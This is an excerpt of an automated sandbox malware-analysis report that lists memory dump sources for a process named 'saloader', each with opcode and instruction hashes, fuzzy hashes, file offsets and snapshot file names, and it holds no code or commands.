• Opcode ID: 939a95cbeb3b5f320040e58f96315b4460a0d57f49ec287ef39028ee38fb16e5
• Instruction ID: 16f308e4f05c75981bfbd916a7e00d967d7c6cc5785fce66abc5d9f33b522fd2
• Opcode Fuzzy Hash: 939a95cbeb3b5f320040e58f96315b4460a0d57f49ec287ef39028ee38fb16e5
• Instruction Fuzzy Hash: AA318431A1994A8FEB46EB78C415AB9BBF0EF5A340F0451FBD00DC71A3DE28AC458780
Memory Dump Source
• Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
• Joe Sandbox IDA Plugin Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
• Similarity: no API ID, String ID or API String ID recorded
• Opcode ID: b54eb93ceaf3be921092cbee94b4256fb619cf7e0b0741029d5e5ce59dcf7bd5
• Instruction ID: 3630eba7d59d7b0a1cb96f9a2bb72b7c5a5287d644dd0c74b66bfcb76c5a724a
• Opcode Fuzzy Hash: b54eb93ceaf3be921092cbee94b4256fb619cf7e0b0741029d5e5ce59dcf7bd5
• Instruction Fuzzy Hash: E031C431A18A4E8FEB95EF2CC494AB577E1FF99350B2441BAD44EC7292DE24DC46C780
Memory Dump Source
• Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
• Joe Sandbox IDA Plugin Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
• Similarity: no API ID, String ID or API String ID recorded
• Opcode ID: 41dd82b05caeca3dcc38cdbd8ae6a9264b51aad9a5f9c8f577411f33e731d70a
• Instruction ID: 6eb5f087610678011d749b0fb556ad920259081ebdd30c2b4362d82aa3d51fc5
• Opcode Fuzzy Hash: 41dd82b05caeca3dcc38cdbd8ae6a9264b51aad9a5f9c8f577411f33e731d70a
• Instruction Fuzzy Hash: 83314C71909F058AE7A9DB28C4492B2B6E0FF25315F508A3EC19FD2AA0DB75E449C780
Memory Dump Source
• Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
• Joe Sandbox IDA Plugin Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
• Similarity: no API ID, String ID or API String ID recorded
• Opcode ID: 61ae2e704d9578591dac2e9c2c536fa95489274f77dd86b854fe1b69d67386e8
• Instruction ID: e5ac685cfca4b3ef83eb8f574edd04095a1cb42d14d31fb5563aa82f97117dfc
• Opcode Fuzzy Hash: 61ae2e704d9578591dac2e9c2c536fa95489274f77dd86b854fe1b69d67386e8
• Instruction Fuzzy Hash: 2B31B362C0E5968EF76797244C159F9BBE0EF4B220B0CA1F6C49CC7593E91CA51E87C2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8005864a4073b1bf10ad9537415a778a353c0602e423000b69520d232ca106e3
                                                                                          • Instruction ID: e89b8c0daf31ac87abd4e16b7f50528e8cf82b525480d9f7cf685d430567d436
                                                                                          • Opcode Fuzzy Hash: 8005864a4073b1bf10ad9537415a778a353c0602e423000b69520d232ca106e3
                                                                                          • Instruction Fuzzy Hash: 0131A679D2D94A8FFB46E768C455AB977E0FF06302B0461BAD04EC7193CD28E9098780
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cb0c037f0539f11d95a1452f124c38d1cf536e8c3ee0d2702e5ceca93d4bacdd
                                                                                          • Instruction ID: c81369698af307324ad19c859a1578a011c804d2471c7d2f1fa975733dee2910
                                                                                          • Opcode Fuzzy Hash: cb0c037f0539f11d95a1452f124c38d1cf536e8c3ee0d2702e5ceca93d4bacdd
                                                                                          • Instruction Fuzzy Hash: 4B31D322C0E5868EF763876448151F4BBE8EF47221B08A1B6D4ADC74D3E91CA50E87C2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f6974426d0c7e8a47cdaa5972a1b1b228b213867bc6f8ee3b7f9b5e52a1bfee4
                                                                                          • Instruction ID: f240803f2499cc525c350d8cd51b7c8ce8d3a04a52a1c9e7cfb4cefffb207930
                                                                                          • Opcode Fuzzy Hash: f6974426d0c7e8a47cdaa5972a1b1b228b213867bc6f8ee3b7f9b5e52a1bfee4
                                                                                          • Instruction Fuzzy Hash: 7631C736C0EA9E8AF762E72454011F9F6D1EF56350F04A5B6D44CCB0D2FD28A91EC6C1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1bb7d064d9cbd67578ac00530c8e74d615c3d91c64e72830343a3a662f854572
                                                                                          • Instruction ID: fe6a42eaabfe8ee812bd7e03e8916499fcab6235f92c689bde876d860fac2f43
                                                                                          • Opcode Fuzzy Hash: 1bb7d064d9cbd67578ac00530c8e74d615c3d91c64e72830343a3a662f854572
                                                                                          • Instruction Fuzzy Hash: 6431581294DBD54AF3A7833C68543B6BFC1AF12324F4821BBC889C69C2D94DF989C381
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: eaebc8e647da1b5013383aed11fa1a52f7e08072e64eab412943603f31384bc9
                                                                                          • Instruction ID: a89f996165ccf199d5f247346de29f312a13730255e3ee66c0e196a5da691205
                                                                                          • Opcode Fuzzy Hash: eaebc8e647da1b5013383aed11fa1a52f7e08072e64eab412943603f31384bc9
                                                                                          • Instruction Fuzzy Hash: 9921B57162CA454FEB4CE628948A9BA77D1FBA9310F54903EF08FC3597DD24E8064686
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ef15851197c7d81f9fc2fa19ebaa3008007026e077362d5083f8340ef98b826a
                                                                                          • Instruction ID: aec8d6bc9fe1a21402564caa43cef7650e0a47665413c14dfdcbe2e95657b10d
                                                                                          • Opcode Fuzzy Hash: ef15851197c7d81f9fc2fa19ebaa3008007026e077362d5083f8340ef98b826a
                                                                                          • Instruction Fuzzy Hash: 66213561A1DB498FF369D72C8855171B7E1EF8E210B14A6FBD04DC72D6D928EC8983C2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ae88b75771eebee728f142aee25816bb428dd95778c34de9aaa22c7899231634
                                                                                          • Instruction ID: e1365aa5490f25c5435ded091179931d6c0e4b37217c92d24f3951bf02c3406f
                                                                                          • Opcode Fuzzy Hash: ae88b75771eebee728f142aee25816bb428dd95778c34de9aaa22c7899231634
                                                                                          • Instruction Fuzzy Hash: F0212521B1CA898FE759E77C445A6747BD2EF8A215B0441FAE00DC72A3DD28DC4A83D1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b92439c4ec137ad9533223d281c4d9618d02f4e625f62b001a8cb8241b771e2b
                                                                                          • Instruction ID: 317af0a5af9f457c3ed016bfe279e2e3502809faeb0b2e8673746af514d11664
                                                                                          • Opcode Fuzzy Hash: b92439c4ec137ad9533223d281c4d9618d02f4e625f62b001a8cb8241b771e2b
                                                                                          • Instruction Fuzzy Hash: 7921B531619A0A8FEB54EB2DD88596177E2FF59320710837DD08EC32A6DA28FC8587C0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1d3a7d2dccb9c25d58c55b247e155d8771f7dded8ad8df6fec81d2f3139e2c89
                                                                                          • Instruction ID: 59a2f0f030d26f4d48cd51a1c1099fa2e30790eef94c7a775991e77f6f85c9a5
                                                                                          • Opcode Fuzzy Hash: 1d3a7d2dccb9c25d58c55b247e155d8771f7dded8ad8df6fec81d2f3139e2c89
                                                                                          • Instruction Fuzzy Hash: C421D237C0A99E8AF7B1E7245C119F9B6D1EF4A310F086176D41CD3582FD1CA91D46C1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 88a1a2a9519c0795b4f8be357d26dd959deffa7f526460e57c98a0073802872d
                                                                                          • Instruction ID: 657828c09e383227a0efc2a56d07fa8286584803ee1b445e6878fa43190261e3
                                                                                          • Opcode Fuzzy Hash: 88a1a2a9519c0795b4f8be357d26dd959deffa7f526460e57c98a0073802872d
                                                                                          • Instruction Fuzzy Hash: 0A217F30718D088FEA9CEB2CD489EB577E1FBA9310B10516DE44EC36A6DE24EC45C780
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 06c39ad088efc9423133f677233d5e0951a420067c04de7ca2dcff95ad83a0ba
                                                                                          • Instruction ID: 57dccfa86c52c11992fd1c4e3a6b122f8bed59dbd03ae07603820b286a9fcbbc
                                                                                          • Opcode Fuzzy Hash: 06c39ad088efc9423133f677233d5e0951a420067c04de7ca2dcff95ad83a0ba
                                                                                          • Instruction Fuzzy Hash: B7313230919B95CFF7AAD7288055371FBE09F16308F18A8A9C48DC65D2D659F8C9C781
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ca55c419b79854edd260f736f9b39f4c5b41ce0bcb574225ccee38afe8c72994
                                                                                          • Instruction ID: 8d17f8d4e5e4086a8e13e4db7b013d0572950b4780ca1e08e4a134a17e0cdf34
                                                                                          • Opcode Fuzzy Hash: ca55c419b79854edd260f736f9b39f4c5b41ce0bcb574225ccee38afe8c72994
                                                                                          • Instruction Fuzzy Hash: D021E93AD0E59A8AFFA2A3144811BFA76F1EF86311F448977D45DC30C2DD18E91E4AC1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cdb3ab150ba32b74351c0bbf6dea64dc7b0ab2eda342cdf7f62e08a6bd2b7988
                                                                                          • Instruction ID: 98c12c5ba1be310101088cb52ef439f817add1bd35553e4c0004079d9bdb30be
                                                                                          • Opcode Fuzzy Hash: cdb3ab150ba32b74351c0bbf6dea64dc7b0ab2eda342cdf7f62e08a6bd2b7988
                                                                                          • Instruction Fuzzy Hash: 9B31326484F3C69FEB5783385854AA07FA45F43330F1AC5FBD08C8A4A3D65D984AC792
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 15dbfa56a1eb59b7a0146929b3141a64cbe24154d2bf2f7e9e4fc79bd81bde12
                                                                                          • Instruction ID: 3b92b62efce5849e737d454d9fd38e4eb61eca6ec54d2ab32bb504e20609ef58
                                                                                          • Opcode Fuzzy Hash: 15dbfa56a1eb59b7a0146929b3141a64cbe24154d2bf2f7e9e4fc79bd81bde12
                                                                                          • Instruction Fuzzy Hash: 9D21E736C0A95D8AFB71E76498011F9B2D8EF56312F047175D4ADC3582FE2CA91D85C1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8ae8c1dc09b3d7f60e4bc24fdf6e0779e9fe83f782f4e651c8f990db361540d4
                                                                                          • Instruction ID: 64c07e6b7404b22bf69988bb259073eb22561d3892cb3c0d301a93df4b6a2f62
                                                                                          • Opcode Fuzzy Hash: 8ae8c1dc09b3d7f60e4bc24fdf6e0779e9fe83f782f4e651c8f990db361540d4
                                                                                          • Instruction Fuzzy Hash: 2821B965D19A4ACFEB86EB6888153B8B7F1FF1A300F0450B6D40DC71D3EA6899858792
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9d2f464c9766921d7e3397cd96a8f70a55286f84cd137b74d7afdd4fc47291df
                                                                                          • Instruction ID: ddd1e73a2120fe126d6d01edc3b78622b85e264cdb66f4ac2d04f81765db5bbe
                                                                                          • Opcode Fuzzy Hash: 9d2f464c9766921d7e3397cd96a8f70a55286f84cd137b74d7afdd4fc47291df
                                                                                          • Instruction Fuzzy Hash: 9821BF72C0AC5ECAFB71E724D801AF9BA95EF46350F00A179E41CC3082FD28A91E46C1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2b43a45d5d5ed8f59886d2d56b1f00916a0ef6f38b8840a99403393611047519
                                                                                          • Instruction ID: af6c8c20aad134075f93c074163f9fa4be0797b095b55d9fef24eec79fc9b363
                                                                                          • Opcode Fuzzy Hash: 2b43a45d5d5ed8f59886d2d56b1f00916a0ef6f38b8840a99403393611047519
                                                                                          • Instruction Fuzzy Hash: 45215E31A19E598FEBA4DB2CC498B217BF1FF29314B0405A9D08EC7AA1DB25FC44CB41
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 457371393587e56a0e0af28dff543c9c020421ace706cbe8a0e0ae9708d19d3a
                                                                                          • Instruction ID: eae56c248d7db10541b95e69b90eee053ac7cd242188ff176125019180cee1d2
                                                                                          • Opcode Fuzzy Hash: 457371393587e56a0e0af28dff543c9c020421ace706cbe8a0e0ae9708d19d3a
                                                                                          • Instruction Fuzzy Hash: 6D014076F0CA098BF6AD9A4C68023B877D1EB89721F54523FE19FD3281DE15A80745C6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f3ff126c6641db40f9f941f03256cdf28666c1e8c1976e095099ad327d01e294
                                                                                          • Instruction ID: b89baa34b4069af8b56734ce41e648e46e67205fa524cd640339e61a8b78ea3c
                                                                                          • Opcode Fuzzy Hash: f3ff126c6641db40f9f941f03256cdf28666c1e8c1976e095099ad327d01e294
                                                                                          • Instruction Fuzzy Hash: AE019276F0CA088BF69D9A4C68032B877D1EB89620F44523FE19FD3281DE15A80745C6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1d2b9dc58a7e9e88dfd7f8762290963adcbc1d8911976a6a420366a4cbdf20f8
                                                                                          • Instruction ID: c8e29eebfe186356b151cd233b59caa8c0bd2045d049e14ffebe291cd6c18e55
                                                                                          • Opcode Fuzzy Hash: 1d2b9dc58a7e9e88dfd7f8762290963adcbc1d8911976a6a420366a4cbdf20f8
                                                                                          • Instruction Fuzzy Hash: 0A11B232E1DA49CBFF95A7685824ABC36F0FF46304F0440AAF44EC3282DF349944D682
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f400813df88f902f1dd435e31e5b0186caa655c840c3d34a0e6b23ee139313f6
                                                                                          • Instruction ID: 6b4f0c863ea52aa523740e3b742ff1f5623c5c2cacfed0ec60ed41912b3fb2bb
                                                                                          • Opcode Fuzzy Hash: f400813df88f902f1dd435e31e5b0186caa655c840c3d34a0e6b23ee139313f6
                                                                                          • Instruction Fuzzy Hash: EF11AC31A09D0A8FF6A5D71CD588A35A2D1FB99211F14A27AD42DC3295EE24EC828380
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e0f885d6692786a73adb543e54a1450a0a9d8fd02502ef06cceab04d553fdb6c
                                                                                          • Instruction ID: 3fcb1ca81b047377465606f1bf07b0e9a03ed651067e68e82a7c65ac0d93fd7a
                                                                                          • Opcode Fuzzy Hash: e0f885d6692786a73adb543e54a1450a0a9d8fd02502ef06cceab04d553fdb6c
                                                                                          • Instruction Fuzzy Hash: 4D017176F0CB098BF75D9A4C68432B877D1EB89A20F04523FE19FD3281DE25A80746C6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6f2b9845b2c2464b6cf905a24673f44f997820f42a5e4764f715337c163c2aa0
                                                                                          • Instruction ID: e34a5187c970f3b7d998d2bdde2fa2772cfddc53439e83476911d2d32c06d07a
                                                                                          • Opcode Fuzzy Hash: 6f2b9845b2c2464b6cf905a24673f44f997820f42a5e4764f715337c163c2aa0
                                                                                          • Instruction Fuzzy Hash: AC11E672D1DB88CFFB95972458295B83BF0EF56304F0400EAE44DC7292DB248944C742
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f76c863595b2ecc95f2a529ba55a0de379126c2794f8fba5f65de416223be0e9
                                                                                          • Instruction ID: 443cf8558789d44a73b7e6c3f67103c661477f218717797501a80af23d743d8d
                                                                                          • Opcode Fuzzy Hash: f76c863595b2ecc95f2a529ba55a0de379126c2794f8fba5f65de416223be0e9
                                                                                          • Instruction Fuzzy Hash: D511047681A68D8FEB16EB3488455E9BFB0EF83200F0414E6E44CCB0A2EA2459198792
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 761b8f2b77de00733fec8aff074f1b4d6004734c85ebe483a48079a2cd68c887
                                                                                          • Instruction ID: 4e5461536cf524fef06836e8736c653c2b14aec0d71ec8d856d5c9533cfa435a
                                                                                          • Opcode Fuzzy Hash: 761b8f2b77de00733fec8aff074f1b4d6004734c85ebe483a48079a2cd68c887
                                                                                          • Instruction Fuzzy Hash: AE11B935D1AF06CFEBAAE7388545671B2E1FF69300B18A47EC02EC2195EE35EC458780
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ac1c9443a6696a32bee713c3247ba4f4a34bf90eee383f925aa1a4b3e73c2163
                                                                                          • Instruction ID: 54d86822f330b0dc3f3f726bf5a79a498ef5870e2a73951dc444095409698388
                                                                                          • Opcode Fuzzy Hash: ac1c9443a6696a32bee713c3247ba4f4a34bf90eee383f925aa1a4b3e73c2163
                                                                                          • Instruction Fuzzy Hash: CD113D30909A49CFE7A5EB29C15576177E1FF1A314F4444ADD08ECBA92CB2AFC85CB41
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 37febbc690505611ce833f75d42140f37e8b5e750b8f37c71d32ced724cb352a
                                                                                          • Instruction ID: f213487f68d47e69fa11a83b10f32d2b407d7921bd619975b852bd443413c718
                                                                                          • Opcode Fuzzy Hash: 37febbc690505611ce833f75d42140f37e8b5e750b8f37c71d32ced724cb352a
                                                                                          • Instruction Fuzzy Hash: 3D01BC2265EBC84FD746A76848A59613FF5EB5B11130900EBD48DCB2A3C909AC0AC3A2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 765857e233d6ff1e7c31199f893cdebcba5e67fa12c8a5a9e3e3ce46da3467de
                                                                                          • Instruction ID: 4000639adc3e06a19c97fc2a34840d6f9d83c32e5748079364c63ef4a7dd4495
                                                                                          • Opcode Fuzzy Hash: 765857e233d6ff1e7c31199f893cdebcba5e67fa12c8a5a9e3e3ce46da3467de
                                                                                          • Instruction Fuzzy Hash: CB114C6A9187128BE784777CF4E24FE37A0FF013A97048177D60EC8263DD28D88642C5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1e1cba74a776add3d90964a494f99eb391702f8f511fa4700d90fab8ae121182
                                                                                          • Instruction ID: 365f6f2470a67b280e7f290eda9afac0bdd27d44c018bc8b3ba755dd317cc4c1
                                                                                          • Opcode Fuzzy Hash: 1e1cba74a776add3d90964a494f99eb391702f8f511fa4700d90fab8ae121182
                                                                                          • Instruction Fuzzy Hash: 5001F732B0E91A4BEAD4F22CB8416FE73E1EFC9215B444577E84DC224AEE1DD88543C1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ce59a5ea827621ba994377ee13fb936b21dfa3de38d5aa0c92aecdbc743bdbd1
                                                                                          • Instruction ID: d8f664cbe2e5d4cb0674c214470c7111d908fc78b820643c3771a319532fdf9a
                                                                                          • Opcode Fuzzy Hash: ce59a5ea827621ba994377ee13fb936b21dfa3de38d5aa0c92aecdbc743bdbd1
